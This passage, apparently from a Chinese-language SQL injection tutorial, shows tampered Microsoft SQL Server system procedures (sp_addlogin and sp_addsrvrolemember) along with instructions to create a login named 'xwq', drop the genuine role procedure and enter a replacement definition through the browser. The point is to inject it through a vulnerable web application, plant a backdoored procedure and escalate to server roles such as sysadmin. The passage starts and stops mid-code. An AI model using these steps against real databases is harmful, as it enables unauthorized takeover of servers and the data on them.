0x800, -- old-style
encryption
@passwd = convert(sysname, convert(varbinary
(30), convert(varchar(30), @passwd)))
end
else if @encryptopt <> ’skip_encryption’
begin
raiserror(15600,-1,-1,’sp_addlogin’)
return 1
end
[page_break]-- ATTEMPT THE INSERT OF THE NEW LOGIN --
INSERT INTO master.dbo.sysxlogins VALUES
(NULL, @sid, @xstatus, getdate(),
getdate(), @loginame, convert(varbinary(256), @passwd),
db_id(@defdb), @deflanguage)
if @@error <> 0 -- this indicates we saw duplicate row
return (1)
-- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE
SYSLOGINS CHANGE --
exec(’use master grant all to null’)
-- FINALIZATION: RETURN SUCCESS/FAILURE --
raiserror(15298,-1,-1)
return (0) -- sp_addlogin
GO
OK,我们新建个用户exec master..sp_addlogin xwq
再drop procedure sp_addsrvrolemember,然后在IE里输入
create procedure sp_addsrvrolemember
@loginame sysname, -- login name
@rolename sysname = NULL -- server role name
as
-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
set nocount on
declare @ret int, -- return value of sp call
@rolebit smallint,
@ismem int
-- DISALLOW USER TRANSACTION --
set implicit_transactions off
IF (@@trancount > 0)
begin
raiserror(15002,-1,-1,’sp_addsrvrolemember’)
return (1)
end
-- CANNOT CHANGE SA ROLES --
if @loginame = ’sa’
begin
raiserror(15405, -1 ,-1, @loginame)
return (1)
end
-- OBTAIN THE BIT FOR THIS ROLE --
select @rolebit = CASE @rolename
WHEN ’sysadmin’ THEN 16
WHEN ’securityadmin’ THEN 32
WHEN ’serveradmin’ THEN 64
WHEN ’setupadmin’ THEN 128
WHEN ’processadmin’ THEN 256
WHEN ’diskadmin’ THEN 512
WHEN ’dbcreator’ THEN 1024
WHEN ’bulkadmin’ THEN 4096
ELSE NULL END
-- ADD ROW FOR NT LOGIN IF NEEDED --
if not exists(select * from master.dbo.syslogins where
loginname = @loginame)
begin
execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame
if (@ret <> 0)
begin
raiserror(15007,-1,-1,@loginame)
return (1)
end
end
-- UPDATE ROLE MEMBERSHIP --
update master.dbo.sysxlogins set xstatus = xstatus
关键词:SQL注入攻击通杀